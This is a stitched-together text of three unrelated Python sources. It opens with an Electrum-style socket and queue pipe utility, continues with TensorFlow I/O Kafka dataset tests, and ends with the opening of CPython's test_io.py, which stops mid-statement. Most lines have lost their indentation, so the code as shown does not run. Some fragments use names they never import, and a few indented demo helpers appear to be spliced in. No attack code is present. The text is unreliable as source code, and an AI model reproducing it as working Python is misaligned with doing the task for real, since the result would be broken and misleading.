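def _parse_json_demo():
    j, rest = parse_json(b'{"id": 1}\n{"id": 2}')
    # j -> {'id': 1}; rest -> b'{"id": 2}' (kept until its newline arrives)
    return j, rest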
class timeout(Exception):
pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
# print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
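# Illustrative sketch (hypothetical helper, added only as an example): two
# QueuePipe ends wired back to back, so whatever one side sends the other gets.
def _queue_pipe_demo():
    a_to_b, b_to_a = queue.Queue(), queue.Queue()
    side_a = QueuePipe(send_queue=a_to_b, get_queue=b_to_a)
    side_b = QueuePipe(send_queue=b_to_a, get_queue=a_to_b)
    side_a.send({'id': 1, 'method': 'ping'})
    return side_b.get()  # -> {'id': 1, 'method': 'ping'}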
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
# backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, file_name):
try:
with open(file_name, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def open_browser(url, new=0, autoraise=True):
return webbrowser.open(url, new, autoraise)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
class VerifiedTxInfo(NamedTuple):
height: int
timestamp: int
txpos: int
header_hash: str
def print_frames(depth=10):
print("--------------------")
for i in range(1, depth):
try:
frame = sys._getframe(i)
print(frame.f_code.co_name, frame.f_code.co_filename, frame.f_lineno)
except ValueError:
return
def make_aiohttp_session(proxy):
if proxy:
connector = SocksConnector(
socks_ver=SocksVer.SOCKS5 if proxy['mode'] == 'socks5' else SocksVer.SOCKS4,
host=proxy['host'],
port=int(proxy['port']),
username=proxy.get('user', None),
password=proxy.get('password', None),
rdns=True
)
return aiohttp.ClientSession(headers={'User-Agent' : 'Qtum Electrum'}, timeout=aiohttp.ClientTimeout(total=10), connector=connector)
else:
return aiohttp.ClientSession(headers={'User-Agent' : 'Qtum Electrum'}, timeout=aiohttp.ClientTimeout(total=10))
class TxMinedInfo(NamedTuple):
height: int # height of block that mined tx
conf: Optional[int] = None # number of confirmations (None means unknown)
timestamp: Optional[int] = None # timestamp of block that mined tx
txpos: Optional[int] = None # position of tx in serialized block
header_hash: Optional[str] = None # hash of block that mined tx
|
test_kafka.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# ==============================================================================
"""Tests for Kafka Output Sequence."""
import sys
import time
import pytest
import numpy as np
import threading
import tensorflow as tf
import tensorflow_io as tfio
def test_kafka_io_tensor():
kafka = tfio.IOTensor.from_kafka("test")
assert kafka.dtype == tf.string
assert kafka.shape.as_list() == [None]
assert np.all(
kafka.to_tensor().numpy() == [("D" + str(i)).encode() for i in range(10)]
)
assert len(kafka.to_tensor()) == 10
@pytest.mark.skip(reason="TODO")
def test_kafka_output_sequence():
"""Test case based on fashion mnist tutorial"""
fashion_mnist = tf.keras.datasets.fashion_mnist
((train_images, train_labels), (test_images, _)) = fashion_mnist.load_data()
class_names = [
"T-shirt/top",
"Trouser",
"Pullover",
"Dress",
"Coat",
"Sandal",
"Shirt",
"Sneaker",
"Bag",
"Ankle boot",
]
train_images = train_images / 255.0
test_images = test_images / 255.0
model = tf.keras.Sequential(
[
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(128, activation=tf.nn.relu),
tf.keras.layers.Dense(10, activation=tf.nn.softmax),
]
)
model.compile(
optimizer="adam", loss="sparse_categorical_crossentropy", metrics=["accuracy"]
)
model.fit(train_images, train_labels, epochs=5)
class OutputCallback(tf.keras.callbacks.Callback):
"""KafkaOutputCallback"""
def __init__(
self, batch_size, topic, servers
): # pylint: disable=super-init-not-called
self._sequence = kafka_ops.KafkaOutputSequence(topic=topic, servers=servers)
self._batch_size = batch_size
def on_predict_batch_end(self, batch, logs=None):
index = batch * self._batch_size
for outputs in logs["outputs"]:
for output in outputs:
self._sequence.setitem(index, class_names[np.argmax(output)])
index += 1
def flush(self):
self._sequence.flush()
channel = "e{}e".format(time.time())
topic = "test_" + channel
# By default batch size is 32
output = OutputCallback(32, topic, "localhost")
predictions = model.predict(test_images, callbacks=[output])
output.flush()
predictions = [class_names[v] for v in np.argmax(predictions, axis=1)]
# Reading from `test_e(time)e` we should get the same result
dataset = tfio.kafka.KafkaDataset(topics=[topic], group="test", eof=True)
for entry, prediction in zip(dataset, predictions):
assert entry.numpy() == prediction.encode()
def test_avro_kafka_dataset():
"""test_avro_kafka_dataset"""
import tensorflow_io.kafka as kafka_io
schema = (
'{"type":"record","name":"myrecord","fields":['
'{"name":"f1","type":"string"},'
'{"name":"f2","type":"long"},'
'{"name":"f3","type":["null","string"],"default":null}'
"]}"
)
dataset = kafka_io.KafkaDataset(["avro-test:0"], group="avro-test", eof=True)
# remove kafka framing
dataset = dataset.map(lambda e: tf.strings.substr(e, 5, -1))
# deserialize avro
dataset = dataset.map(
lambda e: tfio.experimental.serialization.decode_avro(e, schema=schema)
)
entries = [
(e["f1"].numpy().decode(), e["f2"].numpy(), e["f3"].numpy().decode())
for e in dataset
]
assert np.all(entries == [("value1", 1, ""), ("value2", 2, "2"), ("value3", 3, "")])
def test_kafka_stream_dataset():
dataset = tfio.IODataset.stream().from_kafka("test").batch(2)
assert np.all(
[k.numpy().tolist() for (k, _) in dataset]
== np.asarray([("D" + str(i)).encode() for i in range(10)]).reshape((5, 2))
)
def test_kafka_io_dataset():
dataset = tfio.IODataset.from_kafka(
"test", configuration=["fetch.min.bytes=2"]
).batch(2)
# repeat multiple times will result in the same result
for _ in range(5):
assert np.all(
[k.numpy().tolist() for (k, _) in dataset]
== np.asarray([("D" + str(i)).encode() for i in range(10)]).reshape((5, 2))
)
def test_avro_encode_decode():
"""test_avro_encode_decode"""
schema = (
'{"type":"record","name":"myrecord","fields":'
'[{"name":"f1","type":"string"},{"name":"f2","type":"long"}]}'
)
value = [("value1", 1), ("value2", 2), ("value3", 3)]
f1 = tf.cast([v[0] for v in value], tf.string)
f2 = tf.cast([v[1] for v in value], tf.int64)
message = tfio.experimental.serialization.encode_avro([f1, f2], schema=schema)
entries = tfio.experimental.serialization.decode_avro(message, schema=schema)
assert np.all(entries["f1"].numpy() == f1.numpy())
assert np.all(entries["f2"].numpy() == f2.numpy())
def test_kafka_group_io_dataset_primary_cg():
"""Test the functionality of the KafkaGroupIODataset when the consumer group
is being newly created.
NOTE: After the kafka cluster is setup during the testing phase, 10 messages
are written to the 'key-partition-test' topic with 5 in each partition
(topic created with 2 partitions, the messages are split based on the keys).
And the same 10 messages are written into the 'key-test' topic (topic created
with 1 partition, so no splitting of the messages based on the keys).
K0:D0, K1:D1, K0:D2, K1:D3, K0:D4, K1:D5, K0:D6, K1:D7, K0:D8, K1:D9.
Here, messages D0, D2, D4, D6 and D8 are written into partition 0 and the rest are written
into partition 1.
Also, since the messages are read from different partitions, the order of retrieval may not be
the same as storage. Thus, we sort and compare.
"""
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgtestprimary",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(10)])
)
def test_kafka_group_io_dataset_primary_cg_no_lag():
"""Test the functionality of the KafkaGroupIODataset when the
consumer group has read all the messages and committed the offsets.
"""
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgtestprimary",
servers="localhost:9092",
configuration=["session.timeout.ms=7000", "max.poll.interval.ms=8000"],
)
assert np.all(sorted([k.numpy() for (k, _) in dataset]) == [])
def test_kafka_group_io_dataset_primary_cg_new_topic():
"""Test the functionality of the KafkaGroupIODataset when the existing
consumer group reads data from a new topic.
"""
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-test"],
group_id="cgtestprimary",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(10)])
)
def test_kafka_group_io_dataset_resume_primary_cg():
"""Test the functionality of the KafkaGroupIODataset when the
consumer group is yet to catch up with the newly added messages only
(Instead of reading from the beginning).
"""
import tensorflow_io.kafka as kafka_io
# Write new messages to the topic
for i in range(10, 100):
message = "D{}".format(i)
kafka_io.write_kafka(message=message, topic="key-partition-test")
# Read only the newly sent 90 messages
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgtestprimary",
servers="localhost:9092",
configuration=["session.timeout.ms=7000", "max.poll.interval.ms=8000"],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(10, 100)])
)
def test_kafka_group_io_dataset_resume_primary_cg_new_topic():
"""Test the functionality of the KafkaGroupIODataset when the
consumer group is yet to catch up with the newly added messages only
(Instead of reading from the beginning) from the new topic.
"""
import tensorflow_io.kafka as kafka_io
# Write new messages to the topic
for i in range(10, 100):
message = "D{}".format(i)
kafka_io.write_kafka(message=message, topic="key-test")
# Read only the newly sent 90 messages
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-test"],
group_id="cgtestprimary",
servers="localhost:9092",
configuration=["session.timeout.ms=7000", "max.poll.interval.ms=8000"],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(10, 100)])
)
def test_kafka_group_io_dataset_secondary_cg():
"""Test the functionality of the KafkaGroupIODataset when a
secondary consumer group is created and is yet to catch up all the messages,
from the beginning.
"""
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgtestsecondary",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(100)])
)
def test_kafka_group_io_dataset_tertiary_cg_multiple_topics():
"""Test the functionality of the KafkaGroupIODataset when a new
consumer group reads data from multiple topics from the beginning.
"""
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test", "key-test"],
group_id="cgtesttertiary",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(100)] * 2)
)
def test_kafka_group_io_dataset_auto_offset_reset():
"""Test the functionality of the `auto.offset.reset` configuration
at global and topic level"""
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgglobaloffsetearliest",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(100)])
)
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgglobaloffsetlatest",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=latest",
],
)
assert np.all(sorted([k.numpy() for (k, _) in dataset]) == [])
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgtopicoffsetearliest",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"conf.topic.auto.offset.reset=earliest",
],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(100)])
)
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgtopicoffsetlatest",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"conf.topic.auto.offset.reset=latest",
],
)
assert np.all(sorted([k.numpy() for (k, _) in dataset]) == [])
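# A hedged illustration (not used by the tests above): the configuration list mixes
# librdkafka-style global options with topic-level options carrying the "conf.topic."
# prefix, as exercised in test_kafka_group_io_dataset_auto_offset_reset. The helper
# below is an assumption about how one might build such a list, not tensorflow-io API.
def _build_kafka_configuration(global_options, topic_options):
    """Flatten global and topic-level option dicts into the expected list form."""
    configuration = ["{}={}".format(key, value) for key, value in global_options.items()]
    configuration += [
        "conf.topic.{}={}".format(key, value) for key, value in topic_options.items()
    ]
    return configuration
# Example:
#     _build_kafka_configuration(
#         {"session.timeout.ms": 7000}, {"auto.offset.reset": "latest"}
#     ) -> ["session.timeout.ms=7000", "conf.topic.auto.offset.reset=latest"]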
def test_kafka_group_io_dataset_invalid_stream_timeout():
"""Test the functionality of the KafkaGroupIODataset when the
consumer is configured to have an invalid stream_timeout value which is
less than the message_timeout value.
NOTE: The default value for message_timeout=5000
"""
STREAM_TIMEOUT = -20
try:
tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test", "key-test"],
group_id="cgteststreaminvalid",
servers="localhost:9092",
stream_timeout=STREAM_TIMEOUT,
configuration=["session.timeout.ms=7000", "max.poll.interval.ms=8000"],
)
except ValueError as e:
assert str(
e
) == "Invalid stream_timeout value: {} ,set it to -1 to block indefinitely.".format(
STREAM_TIMEOUT
)
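# A hedged sketch of the validation the test above relies on (an assumption about the
# intent, not tensorflow-io internals): any stream_timeout below message_timeout is
# rejected, with -1 acting as the "block indefinitely" sentinel. The error message is
# copied verbatim from the assertion above.
def _validated_stream_timeout(stream_timeout, message_timeout=5000):
    if stream_timeout == -1 or stream_timeout >= message_timeout:
        return stream_timeout
    raise ValueError(
        "Invalid stream_timeout value: {} ,set it to -1 to block indefinitely.".format(
            stream_timeout
        )
    )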
def test_kafka_group_io_dataset_stream_timeout_check():
"""Test the functionality of the KafkaGroupIODataset when the
consumer is configured to have a valid stream_timeout value and thus waits
for the new messages from kafka.
NOTE: The default value for message_timeout=5000
"""
import tensorflow_io.kafka as kafka_io
def write_messages_background():
# Write new messages to the topic in a background thread
time.sleep(6)
for i in range(100, 200):
message = "D{}".format(i)
kafka_io.write_kafka(message=message, topic="key-partition-test")
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgteststreamvalid",
servers="localhost:9092",
stream_timeout=20000,
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
# start writing the new messages to kafka using the background job.
# the job sleeps for some time (< stream_timeout) and then writes the
# messages into the topic.
thread = threading.Thread(target=write_messages_background, args=())
thread.daemon = True
thread.start()
# At the end, after the timeout has occurred, we must have the old 100 messages
# along with the new 100 messages
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(200)])
)
def test_kafka_batch_io_dataset():
"""Test the functionality of the KafkaBatchIODataset by training a model
directly on the incoming kafka message batch(of type tf.data.Dataset), in an
online-training fashion.
NOTE: This kind of dataset is suitable in scenarios where the 'keys' of 'messages'
act as labels. If not, additional transformations are required.
"""
dataset = tfio.experimental.streaming.KafkaBatchIODataset(
topics=["mini-batch-test"],
group_id="cgminibatch",
servers=None,
stream_timeout=5000,
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
NUM_COLUMNS = 1
model = tf.keras.Sequential(
[
tf.keras.layers.Input(shape=(NUM_COLUMNS,)),
tf.keras.layers.Dense(4, activation="relu"),
tf.keras.layers.Dropout(0.1),
tf.keras.layers.Dense(1, activation="sigmoid"),
]
)
model.compile(
optimizer="adam",
        # the final Dense layer already applies a sigmoid, so the loss receives probabilities
        loss=tf.keras.losses.BinaryCrossentropy(from_logits=False),
metrics=["accuracy"],
)
assert issubclass(type(dataset), tf.data.Dataset)
for mini_d in dataset:
mini_d = mini_d.map(
lambda m, k: (
tf.strings.to_number(m, out_type=tf.float32),
tf.strings.to_number(k, out_type=tf.float32),
)
).batch(2)
assert issubclass(type(mini_d), tf.data.Dataset)
# Fits the model as long as the data keeps on streaming
model.fit(mini_d, epochs=5)
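# A hedged sketch (not part of the test suite) of the "additional transformations"
# mentioned in test_kafka_batch_io_dataset: when the Kafka keys are not usable as
# labels, the label can instead be parsed out of the message itself. The CSV layout
# "feature1,feature2,label" assumed here is hypothetical; the module-level `tf`
# import is assumed, as in the tests above.
def _features_and_label_from_message(message, _key):
    values = tf.strings.to_number(tf.strings.split(message, ","), out_type=tf.float32)
    return values[:-1], values[-1]
# Usage inside the training loop above would be, for example:
#     mini_d = mini_d.map(_features_and_label_from_message).batch(2)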
test_io.py
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
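# A minimal sketch of that pattern (illustrative only; the class names below are
# hypothetical and do not exist in this file). The base test stores the
# implementation under test as an attribute, and thin subclasses bind it to the
# C (io) and pure-Python (_pyio) modules:
#
#     class ExampleBytesIOTest:
#         ioclass = None  # bound by the concrete subclasses
#         def test_roundtrip(self):
#             self.assertEqual(self.ioclass(b"data").read(), b"data")
#
#     class CExampleBytesIOTest(ExampleBytesIOTest, unittest.TestCase):
#         ioclass = io.BytesIO
#
#     class PyExampleBytesIOTest(ExampleBytesIOTest, unittest.TestCase):
#         ioclass = pyio.BytesIO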
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
